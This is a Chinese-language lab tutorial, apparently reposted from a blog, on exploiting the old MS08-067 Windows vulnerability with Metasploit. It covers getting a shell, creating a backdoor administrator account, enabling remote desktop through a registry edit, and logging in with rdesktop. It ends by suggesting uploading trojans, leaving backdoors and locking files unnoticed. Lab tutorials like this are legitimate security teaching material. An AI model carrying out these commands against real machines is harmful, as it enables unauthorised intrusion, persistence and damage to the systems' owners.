| 关键词:靶机 漏洞 靶子 命令 输入 kali 端口 通性 之后 配置 |
hello大家好,我是摩西! Ms08-067是微软上的一个漏洞,全称为“Windows Server服务RPC请求缓冲区溢出漏洞”。广泛存在于Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本! 但是这个漏洞很老了,微软早就给出了解决方案,大家也都已经打好了补丁。今天带领大家看看,如果没有打好补丁,我们如何利用这个漏洞对一台电脑进行攻击? 攻击环境准备前提:靶子机有Ms08-067漏洞,攻击机有metasploit工具。工具:VMware平台,kali虚拟机(建议安装英文版)。Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新,重要的是,kali自带这个工具! 第一步:利用漏洞进入靶子机shell界面首先当然是启动kali和有漏洞的系统。 ![]() 分别查看kali和目标机器的IP,因为我们是在虚拟机里面演示,为确保正确,两个机子需要测试连通性。我的kali:192.168.61.129。目标靶机:192.168.61.130。kali ping 目标靶机,连通性没有问题! ![]() 连通性没有问题那我们就开始渗透了,在kali在命令行输入msfconsole,稍等片刻,启动metasploit工具。 ![]() 输入命令:search ms08-067查找ms08-067漏洞,并利用该漏洞! ![]() 使用show options 命令查看需要的配置,然后配置RHOST(靶子机IP 地址),LHOST(本机 IP 地址),LPORT(本地端口),因为该漏洞利 用的是445端口,所以RPORT(靶子机端口)不用配置。本地端口不配置也行,系统会自行分配一个端口。 ![]() 配置完成后,使用search windows/mete命令(模糊查询)查询 payload。查询出来之后选择一个payload进行攻击。我们选择图中这个。 ![]() 全部顺利设置完成之后,输入 exploit 命令:即可利用该漏洞建立会话,会话建立成功后, 输入shell命令即可进入靶子机命令行 。 ![]() 到这里,我们已经是黑进了这个系统,可以做我们想做的了,但是,不是全部,因为我们的权限不是最高的,要想得到最高权限,接下来就得提权了! 第二步:创建用户并提权输入命令net user kali kali123 /add,创建用户kali ,密码为 kali123 (用户和密码可自由填写, 注密码必须是字母加数字) 。因为我已经创建过了,所以提示用户已存在! 将root用户添加到管理员组 ,输入命令net localgroup administrators kali /add。 由于 kali 中文版显示为乱码(建议安装英文版),所以直接在靶子 机上查看是否提权成功 !在靶机命令行直接输入net localgroup administrators就可以查看。如果有kali,说明提权成功! 第三步:开启远程桌面:开启3389端口在shell下输入以下命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " "Server /v fDenyTSConnections /t REG_DWORD /d 0000000 0 /f 输入netstat –an 查看是否开启成功 ![]() 使得目标靶机开启3389端口之后,我们就能远程登陆靶机了,新开一个终端输入rdesktop -f -a 16 IP:3389(IP为靶子机地 址),Rdesktop在kali下是默认安装的,如果没有安装,在终端输入命 令apt-get install rdesktop 进行安装。 ![]() 通过远程登陆靶机之后,就可以干你想干的事了,上传木马啊,留后门啊,锁文件啊,之类的。之后的就凭自己想象了!关键是,这都是在靶机不知不觉中进行的! 好了,本次演示就到这了,感谢各位看官,欢迎指出问题!喜欢可以关注,关注不迷路!文章持续更新哦! |
| 本文出处: https://www.toutiao.com/a6661948070688719371/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|